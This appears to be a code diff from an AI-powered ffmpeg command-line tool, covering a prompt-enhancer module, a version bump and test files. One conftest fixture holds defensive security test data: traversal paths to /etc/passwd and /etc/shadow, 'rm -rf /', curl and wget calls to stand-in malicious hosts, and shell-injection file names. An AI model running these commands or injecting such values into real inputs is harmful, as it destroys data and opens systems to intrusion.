r"\b(?:make\s+it\s+)?horizontal\b",
|
||||
r"convert to 16:9 aspect ratio (horizontal)",
|
||||
),
|
||||
(r"\b(?:make\s+it\s+)?square\b", r"convert to 1:1 aspect ratio (square)"),
|
||||
(r"\b(?:crop|fill)\s+(?:to\s+)?(\d+:\d+)\b", r"crop to \1 aspect ratio"),
|
||||
(r"\b(?:pad|letterbox)\s+(?:to\s+)?(\d+:\d+)\b", r"pad to \1 aspect ratio"),
|
||||
# Duration patterns
|
||||
(
|
||||
r"\b(\d+)\s+(?:second|sec)s?\s+(?:animated\s+)?gif\b",
|
||||
r"\1 second duration animated gif",
|
||||
),
|
||||
(
|
||||
r"\b(\d+)\s+(?:second|sec)s?\s+(?:long\s+)?(?:video|clip)\b",
|
||||
r"\1 second duration video",
|
||||
),
|
||||
(
|
||||
r"\b(\d+)\s+(?:second|sec)s?\s+(?:duration|length)\b",
|
||||
r"\1 second duration",
|
||||
),
|
||||
(
|
||||
r"\b(?:for|with)\s+(\d+)\s+(?:second|sec)s?\b",
|
||||
r"with \1 second duration",
|
||||
),
|
||||
(r"\b(\d+)s\s+(?:animated\s+)?gif\b", r"\1 second duration animated gif"),
|
||||
(r"\b(\d+)s\s+(?:long\s+)?(?:video|clip)\b", r"\1 second duration video"),
|
||||
]
|
||||
|
||||
# File extension patterns for better context
|
||||
self.file_extensions = {
|
||||
"video": [".mp4", ".avi", ".mov", ".mkv", ".webm", ".flv", ".wmv", ".m4v"],
|
||||
"audio": [".mp3", ".wav", ".aac", ".flac", ".ogg", ".m4a", ".wma"],
|
||||
"image": [".jpg", ".jpeg", ".png", ".gif", ".bmp", ".tiff", ".webp"],
|
||||
"subtitle": [".srt", ".ass", ".ssa", ".vtt", ".sub"],
|
||||
}
|
||||
|
||||
def enhance_prompt(self, prompt: str, context: dict[str, Any]) -> str:
|
||||
"""Enhance a user prompt to improve LLM understanding.
|
||||
|
||||
Applies a series of transformations to normalize user input and add
|
||||
context-aware details that help the LLM generate more accurate
|
||||
ffmpeg commands.
|
||||
|
||||
Args:
|
||||
prompt: Original user prompt string
|
||||
context: Dictionary containing file context information (videos,
|
||||
audios, subtitle_files, etc.)
|
||||
|
||||
Returns:
|
||||
Enhanced prompt string with improved clarity and specificity
|
||||
|
||||
Side effects:
|
||||
None - this is a pure function
|
||||
"""
|
||||
enhanced = prompt.strip()
|
||||
|
||||
# Apply pattern replacements in order of specificity
|
||||
for pattern, replacement in self.patterns:
|
||||
enhanced = re.sub(pattern, replacement, enhanced, flags=re.IGNORECASE)
|
||||
|
||||
# Add context-aware enhancements based on available files
|
||||
enhanced = self._add_context_enhancements(enhanced, context)
|
||||
|
||||
# Add missing technical details that would help the LLM
|
||||
enhanced = self._add_missing_details(enhanced)
|
||||
|
||||
# Normalize common terms for consistency
|
||||
enhanced = self._normalize_terms(enhanced)
|
||||
|
||||
return enhanced.strip()
|
||||
|
||||
def _add_context_enhancements(self, prompt: str, context: dict[str, Any]) -> str:
|
||||
"""Add context-aware enhancements based on available files.
|
||||
|
||||
Analyzes the context dictionary to identify available files and
|
||||
adds relevant information to the prompt when appropriate.
|
||||
|
||||
Args:
|
||||
prompt: Current enhanced prompt
|
||||
context: File context dictionary
|
||||
|
||||
Returns:
|
||||
Prompt with context-specific enhancements added
|
||||
"""
|
||||
enhancements = []
|
||||
|
||||
# Check for video files and add context if relevant
|
||||
if context.get("videos"):
|
||||
video_files = context["videos"]
|
||||
if len(video_files) == 1:
|
||||
enhancements.append(f"using video file: {video_files[0]}")
|
||||
elif len(video_files) > 1:
|
||||
enhancements.append(f"using one of {len(video_files)} available video files")
|
||||
|
||||
# Check for subtitle files when subtitle operations are mentioned
|
||||
if context.get("subtitle_files"):
|
||||
subtitle_files = context["subtitle_files"]
|
||||
if "subtitle" in prompt.lower() or "caption" in prompt.lower():
|
||||
if len(subtitle_files) == 1:
|
||||
enhancements.append(f"using subtitle file: {subtitle_files[0]}")
|
||||
elif len(subtitle_files) > 1:
|
||||
enhancements.append(
|
||||
f"using one of {len(subtitle_files)} available subtitle files"
|
||||
)
|
||||
|
||||
# Check for audio files when audio operations are mentioned
|
||||
if context.get("audios"):
|
||||
audio_files = context["audios"]
|
||||
if "audio" in prompt.lower() and len(audio_files) > 0:
|
||||
enhancements.append(f"using one of {len(audio_files)} available audio files")
|
||||
|
||||
# Append all enhancements to the prompt
|
||||
if enhancements:
|
||||
prompt += f" ({', '.join(enhancements)})"
|
||||
|
||||
return prompt
|
||||
|
||||
def _add_missing_details(self, prompt: str) -> str:
|
||||
"""Add missing technical details that would help the LLM.
|
||||
|
||||
Identifies common scenarios where additional technical specifications
|
||||
would improve command generation accuracy.
|
||||
|
||||
Args:
|
||||
prompt: Current enhanced prompt
|
||||
|
||||
Returns:
|
||||
Prompt with missing details added as suggestions
|
||||
"""
|
||||
details = []
|
||||
|
||||
# Suggest resolution when aspect ratio is mentioned but no resolution specified
|
||||
if re.search(r"\b\d+:\d+\s+aspect\s+ratio\b", prompt, re.IGNORECASE):
|
||||
if "9:16" in prompt and "resolution" not in prompt.lower():
|
||||
details.append("suggest 1080x1920 resolution")
|
||||
elif "16:9" in prompt and "resolution" not in prompt.lower():
|
||||
details.append("suggest 1920x1080 resolution")
|
||||
elif "1:1" in prompt and "resolution" not in prompt.lower():
|
||||
details.append("suggest 1080x1080 resolution")
|
||||
|
||||
# Suggest CRF values when quality is mentioned but no specific settings
|
||||
if "quality" in prompt.lower() and "crf" not in prompt.lower():
|
||||
if "high" in prompt.lower():
|
||||
details.append("use CRF 18-23 for high quality")
|
||||
elif "low" in prompt.lower() or "small" in prompt.lower():
|
||||
details.append("use CRF 28-32 for smaller file size")
|
||||
|
||||
# Suggest codec when format conversion is mentioned but no codec specified
|
||||
if (
|
||||
any(ext in prompt.lower() for ext in [".mp4", ".avi", ".mov", ".mkv"])
|
||||
and "codec" not in prompt.lower()
|
||||
):
|
||||
details.append("use appropriate codec for target format")
|
||||
|
||||
# Append all details to the prompt
|
||||
        if details:
            prompt += f" ({', '.join(details)})"

        return prompt

    def _normalize_terms(self, prompt: str) -> str:
        """Normalize common terms for consistency.

        Standardizes formatting and expands common abbreviations to
        improve LLM understanding.

        Args:
            prompt: Current enhanced prompt

        Returns:
            Prompt with normalized terms
        """
        # Normalize aspect ratio formatting (remove spaces around colons)
        prompt = re.sub(r"\b(\d+)\s*:\s*(\d+)\b", r"\1:\2", prompt)

        # Normalize resolution formatting (remove spaces around 'x')
        prompt = re.sub(r"\b(\d{3,4})\s*[xX]\s*(\d{3,4})\b", r"\1x\2", prompt)

        # Expand common abbreviations to full terms
        replacements = {
            "vid": "video",
            "aud": "audio",
            "sub": "subtitle",
            "cap": "caption",
            "res": "resolution",
            "fps": "frame rate",
            "bitrate": "bit rate",
            "codec": "encoding format",
        }

        for abbrev, full in replacements.items():
            prompt = re.sub(rf"\b{abbrev}\b", full, prompt, flags=re.IGNORECASE)

        return prompt

    def suggest_improvements(self, prompt: str) -> list[str]:
        """Suggest improvements for a given prompt.

        Analyzes the prompt for common issues that could lead to
        inaccurate or incomplete ffmpeg command generation.

        Args:
            prompt: User prompt to analyze

        Returns:
            List of improvement suggestions as strings
        """
        suggestions = []

        # Check for vague terms that lack specificity
        vague_terms = ["better", "good", "nice", "proper", "correct", "right"]
        for term in vague_terms:
            if term in prompt.lower():
                suggestions.append(
                    f"Replace '{term}' with specific requirements (e.g., 'high quality', 'small file size')"
                )

        # Check for missing file format specifications
        if "file" in prompt.lower() and not re.search(r"\.[a-zA-Z0-9]+", prompt):
            suggestions.append("Specify file format (e.g., .mp4, .avi)")

        # Check for missing quality specifications when quality is mentioned
        if "quality" in prompt.lower() and "crf" not in prompt.lower():
            suggestions.append("Specify quality level (e.g., 'high quality', 'small file size')")

        # Check for missing aspect ratio when resizing operations are mentioned
        if any(word in prompt.lower() for word in ["resize", "scale", "convert"]) and not re.search(
            r"\d+:\d+", prompt
        ):
            suggestions.append("Specify target aspect ratio (e.g., '16:9', '9:16', '1:1')")

        return suggestions


def enhance_user_prompt(prompt: str, context: dict[str, Any]) -> str:
    """Convenience function to enhance a user prompt.

    Creates a PromptEnhancer instance and applies enhancement to the
    given prompt. Use this for one-off prompt enhancement.

    Args:
        prompt: Original user prompt string
        context: File context information dictionary

    Returns:
        Enhanced prompt string
    """
    enhancer = PromptEnhancer()
    return enhancer.enhance_prompt(prompt, context)


def get_prompt_suggestions(prompt: str) -> list[str]:
    """Get suggestions for improving a user prompt.

    Creates a PromptEnhancer instance and analyzes the prompt for
    potential improvements. Use this for providing user feedback.

    Args:
        prompt: User prompt string to analyze

    Returns:
        List of improvement suggestions as strings
    """
    enhancer = PromptEnhancer()
    return enhancer.suggest_improvements(prompt)
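As a quick illustration of what `_normalize_terms` does to a raw prompt, here is a standalone sketch that reimplements the two regexes and a subset of the abbreviation table above (it does not import the module, so names like `normalize_terms` are local to the example):

```python
import re


def normalize_terms(prompt: str) -> str:
    # Same rules as PromptEnhancer._normalize_terms above.
    prompt = re.sub(r"\b(\d+)\s*:\s*(\d+)\b", r"\1:\2", prompt)  # "16 : 9" -> "16:9"
    prompt = re.sub(r"\b(\d{3,4})\s*[xX]\s*(\d{3,4})\b", r"\1x\2", prompt)  # "1920 x 1080" -> "1920x1080"
    for abbrev, full in {"vid": "video", "res": "resolution"}.items():
        prompt = re.sub(rf"\b{abbrev}\b", full, prompt, flags=re.IGNORECASE)
    return prompt


print(normalize_terms("convert vid to 16 : 9 at 1920 x 1080"))
# convert video to 16:9 at 1920x1080
```

Note that `\b` word boundaries keep the abbreviation expansion from touching substrings inside longer words (e.g. "provide" is not rewritten by the "vid" rule).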
@@ -1 +0,0 @@
__version__ = "0.1.4"
@@ -4,4 +4,6 @@ This module provides the current version number for the ai-ffmpeg-cli package.
The version follows semantic versioning (MAJOR.MINOR.PATCH).
"""

# Current version of the ai-ffmpeg-cli package
# Follows semantic versioning: MAJOR.MINOR.PATCH
__version__ = "0.2.2"
272
tests/conftest.py
Normal file
@@ -0,0 +1,272 @@
"""Test configuration and shared fixtures for ai-ffmpeg-cli.
|
||||
|
||||
This module provides shared test fixtures, configuration, and utilities
|
||||
that can be used across all test modules.
|
||||
"""
|
||||
|
||||
import os
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
from unittest.mock import Mock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from ai_ffmpeg_cli.config import AppConfig
|
||||
from ai_ffmpeg_cli.intent_models import FfmpegIntent, Action
|
||||
from ai_ffmpeg_cli.llm_client import LLMClient
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def temp_dir():
|
||||
"""Create a temporary directory for test files."""
|
||||
with tempfile.TemporaryDirectory() as temp_dir:
|
||||
yield Path(temp_dir)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def sample_video_files(temp_dir):
|
||||
"""Create sample video files for testing."""
|
||||
video_files = []
|
||||
for i in range(3):
|
||||
video_file = temp_dir / f"video_{i}.mp4"
|
||||
video_file.write_text(f"fake video content {i}")
|
||||
video_files.append(video_file)
|
||||
return video_files
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def sample_audio_files(temp_dir):
|
||||
"""Create sample audio files for testing."""
|
||||
audio_files = []
|
||||
for i in range(2):
|
||||
audio_file = temp_dir / f"audio_{i}.mp3"
|
||||
audio_file.write_text(f"fake audio content {i}")
|
||||
audio_files.append(audio_file)
|
||||
return audio_files
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def sample_image_files(temp_dir):
|
||||
"""Create sample image files for testing."""
|
||||
image_files = []
|
||||
for i in range(2):
|
||||
image_file = temp_dir / f"image_{i}.jpg"
|
||||
image_file.write_text(f"fake image content {i}")
|
||||
image_files.append(image_file)
|
||||
return image_files
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_config():
|
||||
"""Create a mock configuration for testing."""
|
||||
config = Mock(spec=AppConfig)
|
||||
config.model = "gpt-4o"
|
||||
config.dry_run = True
|
||||
config.timeout = 60
|
||||
config.allowed_dirs = [Path("/tmp")]
|
||||
config.assume_yes = False
|
||||
config.verbose = False
|
||||
config.output_dir = None
|
||||
return config
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_llm_client():
|
||||
"""Create a mock LLM client for testing."""
|
||||
client = Mock(spec=LLMClient)
|
||||
client.parse.return_value = FfmpegIntent(
|
||||
action=Action.convert,
|
||||
inputs=[Path("test.mp4")],
|
||||
output=Path("output.mp4"),
|
||||
format="mp4",
|
||||
)
|
||||
return client
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def sample_intent():
|
||||
"""Create a sample FFmpeg intent for testing."""
|
||||
return FfmpegIntent(
|
||||
action=Action.convert,
|
||||
inputs=[Path("input.mp4")],
|
||||
output=Path("output.mp4"),
|
||||
format="mp4",
|
||||
video_codec="libx264",
|
||||
audio_codec="aac",
|
||||
)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_context():
|
||||
"""Create a mock context for testing."""
|
||||
return {
|
||||
"videos": ["/path/to/video1.mp4", "/path/to/video2.mov"],
|
||||
"audios": ["/path/to/audio1.mp3"],
|
||||
"images": ["/path/to/image1.jpg"],
|
||||
"most_recent_video": "/path/to/video1.mp4",
|
||||
}
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def cli_runner():
|
||||
"""Create a CLI runner for testing."""
|
||||
from typer.testing import CliRunner
|
||||
|
||||
return CliRunner()
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_ffmpeg():
|
||||
"""Mock FFmpeg execution."""
|
||||
with patch("subprocess.run") as mock_run:
|
||||
mock_run.return_value.returncode = 0
|
||||
mock_run.return_value.stdout = b"FFmpeg output"
|
||||
mock_run.return_value.stderr = b""
|
||||
yield mock_run
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_openai():
|
||||
"""Mock OpenAI API calls."""
|
||||
with patch("openai.OpenAI") as mock_client_class:
|
||||
mock_client = Mock()
|
||||
mock_client.chat.completions.create.return_value.choices[0].message.content = (
|
||||
'{"action": "convert", "inputs": ["test.mp4"], "output": "output.mp4", "format": "mp4"}'
|
||||
)
|
||||
mock_client_class.return_value = mock_client
|
||||
yield mock_client
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_file_system(temp_dir):
|
||||
"""Mock file system operations."""
|
||||
with (
|
||||
patch("pathlib.Path.exists", return_value=True),
|
||||
patch("pathlib.Path.is_file", return_value=True),
|
||||
patch("pathlib.Path.is_dir", return_value=False),
|
||||
):
|
||||
yield
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_user_input():
|
||||
"""Mock user input for interactive tests."""
|
||||
with patch("builtins.input", return_value="y"):
|
||||
yield
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_logging():
|
||||
"""Mock logging for tests."""
|
||||
with patch("ai_ffmpeg_cli.logging_config.config.setup_logging"):
|
||||
yield
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def test_environment():
|
||||
"""Set up test environment variables."""
|
||||
original_env = os.environ.copy()
|
||||
os.environ["OPENAI_API_KEY"] = "test-api-key"
|
||||
os.environ["AICLIP_CONFIG_DIR"] = str(Path.cwd() / "test_config")
|
||||
yield
|
||||
os.environ.clear()
|
||||
os.environ.update(original_env)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_credential_security():
|
||||
"""Mock credential security functions."""
|
||||
with (
|
||||
patch(
|
||||
"ai_ffmpeg_cli.credential_security.validate_api_key_format",
|
||||
return_value=True,
|
||||
),
|
||||
patch("ai_ffmpeg_cli.credential_security.mask_api_key", return_value="sk-***"),
|
||||
):
|
||||
yield
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_path_security():
|
||||
"""Mock path security functions."""
|
||||
with (
|
||||
patch("ai_ffmpeg_cli.path_security.is_safe_path", return_value=True),
|
||||
patch("ai_ffmpeg_cli.path_security.validate_ffmpeg_command", return_value=True),
|
||||
):
|
||||
yield
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def performance_test_data():
|
||||
"""Create test data for performance tests."""
|
||||
return {
|
||||
"large_video": b"x" * (100 * 1024 * 1024), # 100MB
|
||||
"many_files": [f"file_{i}.mp4" for i in range(1000)],
|
||||
"complex_intent": FfmpegIntent(
|
||||
action=Action.convert,
|
||||
inputs=[Path(f"input_{i}.mp4") for i in range(10)],
|
||||
output=Path("output.mp4"),
|
||||
format="mp4",
|
||||
video_codec="libx264",
|
||||
audio_codec="aac",
|
||||
filters=["scale=1920:1080", "fps=30"],
|
||||
),
|
||||
}
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def security_test_data():
|
||||
"""Create test data for security tests."""
|
||||
return {
|
||||
"dangerous_paths": [
|
||||
"../../../etc/passwd",
|
||||
"..\\..\\windows\\system32",
|
||||
"/etc/shadow",
|
||||
"C:\\Windows\\System32\\cmd.exe",
|
||||
],
|
||||
"dangerous_commands": [
|
||||
["rm", "-rf", "/"],
|
||||
["curl", "http://evil.com"],
|
||||
["wget", "http://malware.com"],
|
||||
],
|
||||
"injection_attempts": [
|
||||
"input.mp4; rm -rf /",
|
||||
"input.mp4 | curl evil.com",
|
||||
"input.mp4 && wget malware.com",
|
||||
],
|
||||
}
|
||||
|
||||
|
||||
# Test markers for different test categories
|
||||
def pytest_configure(config):
|
||||
"""Configure pytest with custom markers."""
|
||||
config.addinivalue_line("markers", "unit: mark test as a unit test")
|
||||
config.addinivalue_line("markers", "integration: mark test as an integration test")
|
||||
config.addinivalue_line("markers", "e2e: mark test as an end-to-end test")
|
||||
config.addinivalue_line("markers", "performance: mark test as a performance test")
|
||||
config.addinivalue_line("markers", "security: mark test as a security test")
|
||||
config.addinivalue_line("markers", "slow: mark test as slow running")
|
||||
config.addinivalue_line("markers", "fast: mark test as fast running")
|
||||
|
||||
|
||||
# Test collection configuration
|
||||
def pytest_collection_modifyitems(config, items):
|
||||
"""Modify test collection to add markers based on file location."""
|
||||
for item in items:
|
||||
# Add markers based on test file location
|
||||
if "unit/" in str(item.fspath):
|
||||
item.add_marker(pytest.mark.unit)
|
||||
elif "integration/" in str(item.fspath):
|
||||
item.add_marker(pytest.mark.integration)
|
||||
elif "e2e/" in str(item.fspath):
|
||||
item.add_marker(pytest.mark.e2e)
|
||||
elif "performance/" in str(item.fspath):
|
||||
item.add_marker(pytest.mark.performance)
|
||||
elif "security/" in str(item.fspath):
|
||||
item.add_marker(pytest.mark.security)
|
||||
|
||||
# Add speed markers based on test name
|
||||
if "performance" in item.name or "load" in item.name or "memory" in item.name:
|
||||
item.add_marker(pytest.mark.slow)
|
||||
else:
|
||||
item.add_marker(pytest.mark.fast)
|
||||
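The file-creation fixtures above all follow the same pattern: write small placeholder files under a temporary root and hand the paths to the test. A standalone sketch of that pattern, outside pytest (the `make_sample_videos` helper is hypothetical and mirrors the `sample_video_files` fixture):

```python
import tempfile
from pathlib import Path


def make_sample_videos(root: Path, count: int = 3) -> list[Path]:
    # Same placeholder-file pattern as the sample_video_files fixture above:
    # the files contain fake text, which is enough for path/scan logic tests.
    files = []
    for i in range(count):
        f = root / f"video_{i}.mp4"
        f.write_text(f"fake video content {i}")
        files.append(f)
    return files


with tempfile.TemporaryDirectory() as tmp:
    videos = make_sample_videos(Path(tmp))
    print([v.name for v in videos])
# ['video_0.mp4', 'video_1.mp4', 'video_2.mp4']
```

In the pytest version, `TemporaryDirectory` cleanup happens automatically when the `temp_dir` fixture's generator resumes after `yield`.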
5
tests/e2e/__init__.py
Normal file
@@ -0,0 +1,5 @@
"""End-to-end tests for ai-ffmpeg-cli.
|
||||
|
||||
This package contains end-to-end tests that verify complete workflows.
|
||||
E2E tests focus on testing the entire application from user input to output.
|
||||
"""
|
||||
@@ -7,7 +7,7 @@ from unittest.mock import patch
import pytest
import typer

from ai_ffmpeg_cli.errors import ConfigError
from ai_ffmpeg_cli.custom_exceptions import ConfigError
from ai_ffmpeg_cli.main import _make_llm
from ai_ffmpeg_cli.main import main

@@ -61,8 +61,8 @@ class TestMainCLI:
    ):
        """Test one-shot mode with successful execution."""
        from ai_ffmpeg_cli.config import AppConfig
        from ai_ffmpeg_cli.nl_schema import Action
        from ai_ffmpeg_cli.nl_schema import FfmpegIntent
        from ai_ffmpeg_cli.intent_models import Action
        from ai_ffmpeg_cli.intent_models import FfmpegIntent

        # Setup mocks
        config = AppConfig(openai_api_key="test-key", dry_run=False)
@@ -104,7 +104,7 @@ class TestMainCLI:
    def test_one_shot_mode_parse_error(self, mock_make_llm, mock_scan, mock_load_config):
        """Test one-shot mode with parsing error."""
        from ai_ffmpeg_cli.config import AppConfig
        from ai_ffmpeg_cli.errors import ParseError
        from ai_ffmpeg_cli.custom_exceptions import ParseError

        # Setup mocks
        config = AppConfig(openai_api_key="test-key")
@@ -132,7 +132,7 @@ class TestMainCLI:
    @patch("ai_ffmpeg_cli.main.load_config")
    def test_config_error(self, mock_load_config):
        """Test configuration error handling."""
        from ai_ffmpeg_cli.errors import ConfigError
        from ai_ffmpeg_cli.custom_exceptions import ConfigError

        mock_load_config.side_effect = ConfigError("Config failed")

@@ -152,7 +152,14 @@ class TestMainCLI:
    def test_model_parameter_validation(self):
        """Test that model parameter validation works."""
        # This is a simpler test that doesn't require complex mocking
        valid_models = ["gpt-4o", "gpt-4o-mini", "gpt-3.5-turbo"]
        valid_models = [
            "gpt-5",
            "gpt-5-mini",
            "gpt-5-nano",
            "gpt-4o",
            "gpt-4o-mini",
            "gpt-3.5-turbo",
        ]

        # Test that these are valid model names (basic validation)
        for model in valid_models:
5
tests/fixtures/__init__.py
vendored
Normal file
@@ -0,0 +1,5 @@
"""Test fixtures for ai-ffmpeg-cli.
|
||||
|
||||
This package contains shared test fixtures and utilities.
|
||||
Fixtures provide reusable test data and setup for multiple test modules.
|
||||
"""
|
||||
5
tests/integration/__init__.py
Normal file
@@ -0,0 +1,5 @@
"""Integration tests for ai-ffmpeg-cli.
|
||||
|
||||
This package contains integration tests that verify component interactions.
|
||||
Integration tests focus on testing how multiple components work together.
|
||||
"""
|
||||
@@ -8,16 +8,15 @@ This module tests the new features that were implemented to fix cookbook command
- New action types (extract_frames, format_convert)
"""

import json
import tempfile
from pathlib import Path
from unittest.mock import Mock, patch
from unittest.mock import Mock

import pytest

from ai_ffmpeg_cli.intent_models_extended import Action
from ai_ffmpeg_cli.intent_models_extended import FfmpegIntent
from ai_ffmpeg_cli.intent_router import route_intent
from ai_ffmpeg_cli.llm_client import LLMClient, OpenAIProvider
from ai_ffmpeg_cli.intent_schema import Action, FfmpegIntent
from ai_ffmpeg_cli.llm_client import LLMClient


class TestFormatConversion:
@@ -162,7 +161,7 @@ class TestEnhancedScaling:
        assert len(plan.entries) == 1
        entry = plan.entries[0]
        assert "-vf" in entry.args
        assert "scale=iw*0.5:ih*0.5" in entry.args
        assert "scale=iw*0.5:ih*0.5:force_original_aspect_ratio=decrease" in entry.args

    def test_specific_resolution_scaling_intent(self):
        """Test specific resolution scaling intent routing."""
@@ -179,7 +178,7 @@ class TestEnhancedScaling:
        assert len(plan.entries) == 1
        entry = plan.entries[0]
        assert "-vf" in entry.args
        assert "scale=1920:1080" in entry.args
        assert "scale=1920:1080:force_original_aspect_ratio=decrease" in entry.args

    def test_enhanced_convert_with_filters(self):
        """Test enhanced convert with multiple filters."""
@@ -196,7 +195,7 @@ class TestEnhancedScaling:
        assert len(plan.entries) == 1
        entry = plan.entries[0]
        assert "-vf" in entry.args
        assert "scale=1280:720,fps=30" in entry.args
        assert "fps=30,scale=1280:720:force_original_aspect_ratio=decrease" in entry.args


class TestEnhancedRemoveAudio:
@@ -265,7 +264,9 @@ class TestLLMResponseFixing:
        """Test fixing null filters in LLM response."""
        client = LLMClient(Mock())

        response = '{"action": "convert", "inputs": ["test.mp4"], "filters": null, "extra_flags": []}'
        response = (
            '{"action": "convert", "inputs": ["test.mp4"], "filters": null, "extra_flags": []}'
        )
        fixed = client._fix_common_issues(response)

        assert '"filters": []' in fixed
@@ -275,7 +276,9 @@ class TestLLMResponseFixing:
        """Test fixing null extra_flags in LLM response."""
        client = LLMClient(Mock())

        response = '{"action": "convert", "inputs": ["test.mp4"], "filters": [], "extra_flags": null}'
        response = (
            '{"action": "convert", "inputs": ["test.mp4"], "filters": [], "extra_flags": null}'
        )
        fixed = client._fix_common_issues(response)

        assert '"extra_flags": []' in fixed
@@ -285,9 +288,7 @@ class TestLLMResponseFixing:
        """Test fixing null inputs in LLM response."""
        client = LLMClient(Mock())

        response = (
            '{"action": "convert", "inputs": null, "filters": [], "extra_flags": []}'
        )
        response = '{"action": "convert", "inputs": null, "filters": [], "extra_flags": []}'
        fixed = client._fix_common_issues(response)

        assert '"inputs": []' in fixed
@@ -309,7 +310,9 @@ class TestLLMResponseFixing:
        """Test fixing missing array brackets for extra_flags."""
        client = LLMClient(Mock())

        response = '{"action": "convert", "inputs": ["test.mp4"], "filters": [], "extra_flags": "-y"}'
        response = (
            '{"action": "convert", "inputs": ["test.mp4"], "filters": [], "extra_flags": "-y"}'
        )
        fixed = client._fix_common_issues(response)

        # The regex replacement might add extra brackets, so we check for the pattern
@@ -346,9 +349,7 @@ class TestSchemaValidation:

    def test_format_convert_validation(self):
        """Test format_convert validation requires format parameter."""
        with pytest.raises(
            ValueError, match="format_convert requires format parameter"
        ):
        with pytest.raises(ValueError, match="format_convert requires format parameter"):
            FfmpegIntent(
                action=Action.format_convert,
                inputs=[Path("test.mp4")],
@@ -457,7 +458,7 @@ class TestIntegrationScenarios:
        assert len(plan.entries) == 1
        entry = plan.entries[0]
        assert "-vf" in entry.args
        assert "scale=iw*0.5:ih*0.5" in entry.args
        assert "scale=iw*0.5:ih*0.5:force_original_aspect_ratio=decrease" in entry.args
        assert "-c:v" in entry.args
        assert "libx264" in entry.args
        assert "-c:a" in entry.args
@@ -489,9 +490,7 @@ class TestErrorHandling:

    def test_missing_format_error_message(self):
        """Test that missing format gives clear error message."""
        with pytest.raises(
            ValueError, match="format_convert requires format parameter"
        ):
        with pytest.raises(ValueError, match="format_convert requires format parameter"):
            FfmpegIntent(
                action=Action.format_convert,
                inputs=[Path("test.mp4")],
@@ -8,7 +8,7 @@ from unittest.mock import patch

import pytest

from ai_ffmpeg_cli.errors import ExecError
from ai_ffmpeg_cli.custom_exceptions import ExecError
from ai_ffmpeg_cli.executor import _check_overwrite_protection
from ai_ffmpeg_cli.executor import _extract_output_path
from ai_ffmpeg_cli.executor import _format_command
@@ -123,7 +123,7 @@ class TestCheckOverwriteProtection:
        assert result is True

    @patch("ai_ffmpeg_cli.executor.confirm_prompt")
    @patch("ai_ffmpeg_cli.executor.Console")
    @patch("ai_ffmpeg_cli.executor.console")
    def test_existing_files_confirm_yes(self, mock_console, mock_confirm, tmp_path):
        """Test with existing files and user confirms overwrite."""
        output_file = tmp_path / "existing.mp4"
@@ -140,7 +140,7 @@ class TestCheckOverwriteProtection:
        )

    @patch("ai_ffmpeg_cli.executor.confirm_prompt")
    @patch("ai_ffmpeg_cli.executor.Console")
    @patch("ai_ffmpeg_cli.executor.console")
    def test_existing_files_confirm_no(self, mock_console, mock_confirm, tmp_path):
        """Test with existing files and user declines overwrite."""
        output_file = tmp_path / "existing.mp4"
@@ -154,7 +154,7 @@ class TestCheckOverwriteProtection:
        assert result is False

    @patch("ai_ffmpeg_cli.executor.confirm_prompt")
    @patch("ai_ffmpeg_cli.executor.Console")
    @patch("ai_ffmpeg_cli.executor.console")
    def test_multiple_existing_files(self, mock_console, mock_confirm, tmp_path):
        """Test with multiple existing files."""
        output1 = tmp_path / "existing1.mp4"
@@ -172,7 +172,7 @@ class TestCheckOverwriteProtection:

        assert result is True
        # Should show both files in warning
        mock_console.return_value.print.assert_called()
        mock_console.print.assert_called()

    def test_mixed_existing_nonexisting_files(self, tmp_path):
        """Test with mix of existing and non-existing files."""
@@ -185,8 +185,10 @@ class TestCheckOverwriteProtection:
        ]

        with (
            patch("ai_ffmpeg_cli.executor.confirm_prompt", return_value=True) as mock_confirm,
            patch("ai_ffmpeg_cli.executor.Console"),
            patch(
                "ai_ffmpeg_cli.executor.confirm_prompt", return_value=True
            ) as mock_confirm,
            patch("ai_ffmpeg_cli.executor.console"),
        ):
            result = _check_overwrite_protection(commands, assume_yes=False)

@@ -198,18 +200,16 @@ class TestCheckOverwriteProtection:
class TestPreview:
    """Test command preview functionality."""

    @patch("ai_ffmpeg_cli.executor.Console")
    @patch("ai_ffmpeg_cli.executor.console")
    def test_preview_single_command(self, mock_console):
        """Test previewing single command."""
        commands = [["ffmpeg", "-i", "input.mp4", "output.mp4"]]

        preview(commands)

        mock_console.assert_called_once()
        console_instance = mock_console.return_value
        console_instance.print.assert_called_once()
        mock_console.print.assert_called()

    @patch("ai_ffmpeg_cli.executor.Console")
    @patch("ai_ffmpeg_cli.executor.console")
    def test_preview_multiple_commands(self, mock_console):
        """Test previewing multiple commands."""
        commands = [
@@ -220,12 +220,10 @@ class TestPreview:

        preview(commands)

        mock_console.assert_called_once()
        console_instance = mock_console.return_value
        console_instance.print.assert_called_once()
        mock_console.print.assert_called()

        # Table should be created with correct number of rows (assert print called)
        assert console_instance.print.called
        assert mock_console.print.called


class TestRun:
@@ -254,7 +252,9 @@ class TestRun:
    @patch("ai_ffmpeg_cli.executor.preview")
    @patch("ai_ffmpeg_cli.executor._check_overwrite_protection")
    @patch("ai_ffmpeg_cli.executor.subprocess.run")
    def test_run_successful_execution(self, mock_subprocess, mock_overwrite, mock_preview):
    def test_run_successful_execution(
        self, mock_subprocess, mock_overwrite, mock_preview
    ):
        """Test successful command execution."""
        commands = [["ffmpeg", "-i", "input.mp4", "output.mp4"]]
        mock_overwrite.return_value = True
@@ -262,7 +262,9 @@ class TestRun:
        mock_result.returncode = 0
